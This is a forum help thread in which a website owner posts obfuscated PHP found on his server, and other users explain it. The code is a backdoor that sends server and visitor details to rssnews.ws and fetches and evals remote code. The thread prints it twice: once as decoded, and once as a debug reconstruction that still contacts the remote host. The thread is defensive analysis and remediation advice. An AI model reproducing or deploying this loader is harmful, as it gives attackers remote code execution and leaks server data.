Help! Found this in my website, no idea what it is!

[NeverPool]

Hey I need some serious help. I was going through my directories and I found the following code in my website, I have no idea what it is, where it came from, or what it does. If you can help me I'd greatly appreciate it!

 

The code is to long to fit in the message so I will attach the file.

 

 

[attachment deleted by admin]

[NeverPool]

After using a base64 decoder I found out that some of it leads to a website called "rssnews.ws", upon investigation I find that the server is unresponsive. Still have no clue what this does.

 

Here's the decoded code:

base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("rssnews.ws");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="k®œßtÛ]µÛÍÙ§iݸwŽ×¾õ") $f=$_REQUEST["id"];if((include(base64_decode("http://ads.").$f.$z)));else if($c=file_get_contents(base64_decode("http://7.").$f.$z))eval($c);else{$cu=curl_init(base64_decode("http://71.").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

[Mchl]

Congratulations, you've got your site infected.

Change your ftp passwords, as apparently someone has ganed access to them. Also scan your PC in search of keyloggers etc.

Do NOT store your passwords in FTP clients.

[NeverPool]

Changed all my passwords, thanks

[PFMaBiSmAd]

The code attempts to A) read some remote php code and execute it on your server, and B) supply your server information to the rssnews.ws site so that it knows it found a site that files can be placed on. Three different sub-domains of the ....ws site are used so that it can determine which method(s) are available to get remote code to execute on your server (include, file_get_contents/eval, or curl/eval.)

 

You need to find out how the file was placed on your server. The web server access log would help pin down how it was placed on your server (a file upload script, some other script (such as a CMS or forum that allows file upload), FTP, web hosting control panel, ...) and if it was accessed.

[ChemicalBliss]

Yeah, this will give you the information form it:

 

<?php
error_reporting(0);
$a = (isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z = "/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);

// Debug:
echo('a: '.$a.'<br />'
.'b: '.$b.'<br />'
.'c: '.$c.'<br />'
.'d: '.$d.'<br />'
.'e: '.$e.'<br />'
.'f: '.$f.'<br />'
.'g: '.$g.'<br />'
.'h: '.$h.'<br />'
.'i: '.$i.'<br />'
.'j: '.$j.'<br />'
.'z: '.$z.'<br />'
);

$f = base64_decode("cnNzbmV3cy53cw==");

//Debug
echo('f(2): '.$f.'<br/>');

// Debug
echo('basename($c) = '.basename($c).
'<br />basename($i) = '.basename($i).
'<br />$_REQUEST["q"] = '.$_REQUEST["q"].
'md5($_REQUEST["q"]) = '.md5($_REQUEST["q"]).
'<Br/>MD5 Condition = a66c33902121280a2acdad24d44c1771'
);
if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"])=="a66c33902121280a2acdad24d44c1771"){
$f=$_REQUEST["id"];
}

// Debug
echo('Include: '.base64_decode("aHR0cDovL2Fkcy4=").$f.$z.'<br />'.
'Otherwise - Get Contents: '.base64_decode("aHR0cDovLzcu").$f.$z.'<br />'.
'Last Resort - Connect to '.base64_decode("aHR0cDovLzcxLg==").$f.$z);

// Disabled - if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z))){ }else 

if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z)){
// Debug
echo($c);
// eval($c); - Disabled
}else{
$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o=curl_exec($cu);
curl_close($cu);
// eval($o); - Disabled

// Debug
echo($o);
}
die(); 
?>

 

Basically, it is a script that communicates with another website (you will find out from runnign this script now with the debug - it is php safe no code will be executed).

 

It will show you the code they are trying to execute.

 

The script takes arguments too, so they can pass code directly. etc

[NeverPool]

I've changed my passwords and I've started a system scan on my server computer.

 

What are the chances of this being a serious thing and not being just a bot that guess my stuff?

[PFMaBiSmAd]

It's always serious if someone was able to put a .php script file on your server and be able to request it to get the code in it to be executed.

 

Even if your php settings prevent all three of the methods that script is trying to get remote code to be executed, the simple fact that any .php file can be placed on your server just means that the next file that gets put on your server will be a mini-control panel/file manager script that will allow someone to do anything they want on your site.

 

I would be checking if there are any other unexpected files on your server or if any of your expected files have been modified.